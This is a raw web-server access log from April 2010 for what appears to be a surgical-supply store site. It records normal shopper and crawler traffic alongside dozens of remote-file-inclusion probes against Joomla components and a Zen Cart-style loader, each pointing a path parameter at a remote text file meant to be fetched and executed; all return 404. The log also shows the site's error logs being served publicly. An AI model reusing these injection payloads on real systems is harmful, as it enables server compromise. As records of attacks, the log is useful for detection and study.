61.84.68.4 - - [16/Apr/2010:00:31:37 -0400] "GET /logs/error_log.Q109112600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:41 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:41 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:41 -0400] "GET /logs/access_log.Q110031400//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:50 -0400] "GET /logs/access_log.Q110011500//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.22.207.181 - - [16/Apr/2010:00:31:57 -0400] "GET /logs/access_log.Q110013100//joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:32:08 -0400] "GET /logs/error_log.Q109121300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:32:12 -0400] "GET /logs/error_log.Q110030800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:13 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:13 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:13 -0400] "GET /logs/access_log.Q109103100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:24 -0400] "GET /logs/access_log.Q109103100%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:24 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:00:32:24 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:32:30 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:32:30 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:32:30 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:00:32:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0138085C3EF106006DFB028+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.84.68.4 - - [16/Apr/2010:00:33:05 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:33:05 -0400] "GET /logs/error_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:33:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:33:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
65.55.106.133 - - [16/Apr/2010:00:33:06 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.84.68.4 - - [16/Apr/2010:00:33:09 -0400] "GET /logs/access_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:33:10 -0400] "GET /logs/error_log.Q110020200%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:33:10 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:33:10 -0400] "GET /logs/access_log.Q109100100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
139.168.143.136 - - [16/Apr/2010:00:33:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
139.168.143.136 - - [16/Apr/2010:00:33:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:19 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes%20exagonales HTTP/1.1" 200 38032 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
118.129.170.49 - - [16/Apr/2010:00:33:22 -0400] "GET /logs/error_log.Q109090800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:24 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:25 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:25 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
118.129.170.49 - - [16/Apr/2010:00:33:29 -0400] "GET /logs/error_log.Q109090800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
189.155.145.179 - - [16/Apr/2010:00:33:32 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:33:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):inplantes exagonales" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
61.84.68.4 - - [16/Apr/2010:00:33:49 -0400] "GET /logs/access_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:33:49 -0400] "GET /logs/error_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:33:49 -0400] "GET /logs/error_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:34:06 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:34:06 -0400] "GET /logs/error_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:34:16 -0400] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:34:28 -0400] "GET /logs/error_log.Q109080200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:34:28 -0400] "GET /logs/access_log.Q109082500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:00:34:12 -0400] "GET /logs/error_log.Q109052600 HTTP/1.0" 200 2963699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.62.35.55 - - [16/Apr/2010:00:34:45 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:35:23 -0400] "GET /logs/error_log.Q109112600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:00:35:23 -0400] "GET /logs/error_log.Q109051900%20%20/?sourcedir=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:35:28 -0400] "GET /logs/error_log.Q109121300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:35:37 -0400] "GET /logs/error_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:35:37 -0400] "GET /logs/access_log.Q109092400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:35:58 -0400] "GET /logs/error_log.Q110030800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:36:47 -0400] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:36:47 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:36:47 -0400] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:36:48 -0400] "GET /logs/error_log.Q110031100//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:37:02 -0400] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:37:02 -0400] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:37:06 -0400] "GET /logs/access_log.Q110032400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
79.174.78.178 - - [16/Apr/2010:00:37:22 -0400] "GET /logs/error_log.Q110032400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://mis.cmtc.ac.th/file/pro/one.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:37:24 -0400] "GET /logs/error_log.Q109082800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
88.191.94.188 - - [16/Apr/2010:00:37:24 -0400] "GET /logs/access_log.Q109092400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:37:55 -0400] "GET /logs/access_log.Q109062900//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:37:55 -0400] "GET //administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:37:55 -0400] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:00:37:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.252 - - [16/Apr/2010:00:38:12 -0400] "GET /images/_notes/banner_connect_off.gif.mno HTTP/1.0" 200 254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
